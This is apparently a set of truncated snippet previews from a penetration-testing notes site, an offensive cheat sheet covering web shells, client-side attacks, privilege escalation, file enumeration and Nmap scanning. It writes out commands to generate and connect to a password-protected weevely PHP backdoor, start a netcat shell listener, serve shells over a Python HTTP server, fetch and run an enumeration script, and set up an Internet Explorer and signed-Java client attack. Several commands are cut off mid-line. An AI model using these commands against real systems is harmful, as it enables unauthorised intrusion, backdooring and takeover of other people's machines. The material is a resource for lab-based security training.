Latest notes for PenTesting - MrLeet

MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

AES Decryption

Convert multiple webpages into a word list

for x in 'index' 'about' 'post' 'contact' ; do \
curl http://$ip/$x.html | html2markdown | tr -s ' ' '\n' >> webapp.txt ; \
done

Or convert html to word ...

Web Shag Web Application Vulnerability Assessment Platform

Web Shells
ls -l /usr/share/webshells/

Generate a PHP backdoor (generate) protected with the given password (s3cr3t), then connect to it:
weevely generate s3cr3t
weevely http://$ip/weevely.php s3cr3t


Client Attacks

MS12-037 - Internet Explorer 8 Fixed Col Span ID
wget -O exploit.html
service apache2 start

JAVA Signed Jar client side attack
echo '' > /var/www/html/java.html
User must hit run on the popup that occurs.

Linux Client Shells

Metasploit Meterpreter Privilege Escalation Guide

Try the obvious - Maybe the user is SYSTEM or is already part of the Administrator group:

net user "%username%"

Try the getsystem command in meterpreter - it rarely works, but is worth a try.

De facto Linux Privilege Escalation Guide - A much more thorough guide for Linux enumeration:
Try the obvious - Maybe the user is root or can sudo to root:
sudo su

Here are the commands I have learned to use to perform Linux enumeration and privilege escal...

Post exploitation refers to the actions performed by an attacker once some level of control has been gained over the target.

Simple Local Web Servers

Run a basic http server, great for serving up shells etc
python -m SimpleHTTPServer 80

Run a basic Python3 http server, great for serving up shells etc

Netcat Shell Listener

nc -nlvp 4444

Spawning a TTY Shell - Break out of jail or a limited shell. You should almost always upgrade your shell after taking control of an apache or www user.

(For example, when you encounter the error message "sh: no job control in this shell" while trying to run an exploit.)

(hint: sudo -l to s...

DEP and ASLR - Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR)

Nmap Fuzzers:

NMap Fuzzer List

NMap HTTP Form Fuzzer
nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/regis...

File Enumeration

Find SUID/SGID files (executed with the owner's privileges, e.g. root)

/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

Get handy linux file system enumeration script (/var/tmp)
wget chmod +x ./ ./linux-lo...

Nmap Exploit Scripts

Nmap search through vulnerability scripts
cd /usr/share/nmap/scripts/ ; ls -l *vuln*

Nmap search through Nmap Scripts for a specific keyword
ls /usr/share/nmap/scripts/* | grep ftp

Scan for vulnerable exploits with nmap
nmap --script e...